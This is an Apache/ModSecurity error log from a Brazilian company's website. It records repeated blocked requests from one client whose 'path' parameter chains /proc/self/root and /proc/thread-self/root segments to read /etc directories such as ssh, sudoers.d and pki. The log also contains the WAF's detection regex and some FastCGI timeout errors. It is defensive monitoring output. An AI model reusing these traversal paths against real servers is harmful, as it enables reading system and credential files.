https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:05.299977 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:47068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjGda6ubjKNq_cu4aXwgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:09.114011 2026] [proxy_fcgi:error] [pid 21219:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33248] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:03:10.686365 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:46220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjHgF0L0L-SsrnPo4xTAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:11.890265 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.241.31:46220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjHwF0L0L-SsrnPo4xTgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:03:16.730899 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:46230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjJPqxLDW4GITHUkSr4wAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:20.651229 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:38532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjKPqxLDW4GITHUkSr5wAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:23.720039 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.241.31:38536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjK_qxLDW4GITHUkSr6wAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:03:26.510563 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:38546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjLvu8EFLIOrSqIpvoDgAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:03:31.104433 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:44960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjM-oXxyEfFpUF8f9NTgAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:31.129780 2026] [proxy_fcgi:error] [pid 30424:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33992] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:03:35.211336 2026] [:error] [pid 30424:tid 140411666392832] [client 74.7.241.31:44964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjNst36Dv4L1GW-s-hEgAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:38.515989 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:44696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjOuoXxyEfFpUF8f9NUQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:39.523352 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:44696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjO-oXxyEfFpUF8f9NUgAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:41.623520 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:44712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjPQkwaGbbGflqUZANxwAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:43.372927 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.241.31:44728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjPxCii7xarUs8iHYs3AAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:46.381144 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:44734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjQfu8EFLIOrSqIpvoGwAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:03:47.679009 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:55712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjQ-oXxyEfFpUF8f9NVgAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:03:51.462937 2026] [:error] [pid 8307:tid 140411548894976] [client 74.7.241.31:55722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjR7-FhjpZGs9ba8qtyQAAAxc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:55.966971 2026] [:error] [pid 30424:tid 140411624429312] [client 74.7.241.31:55732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjS8t36Dv4L1GW-s-hIgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:03:57.033820 2026] [proxy_fcgi:error] [pid 21219:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34974] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:03:59.777176 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:56646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjT-oXxyEfFpUF8f9NWwAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:00.907882 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:56646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjUOoXxyEfFpUF8f9NXAAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:04:02.790931 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:56646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjUuoXxyEfFpUF8f9NXgAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:05.995034 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:56646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjVOoXxyEfFpUF8f9NYAAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:04:07.483166 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:47158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjVxCii7xarUs8iHYs_AAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
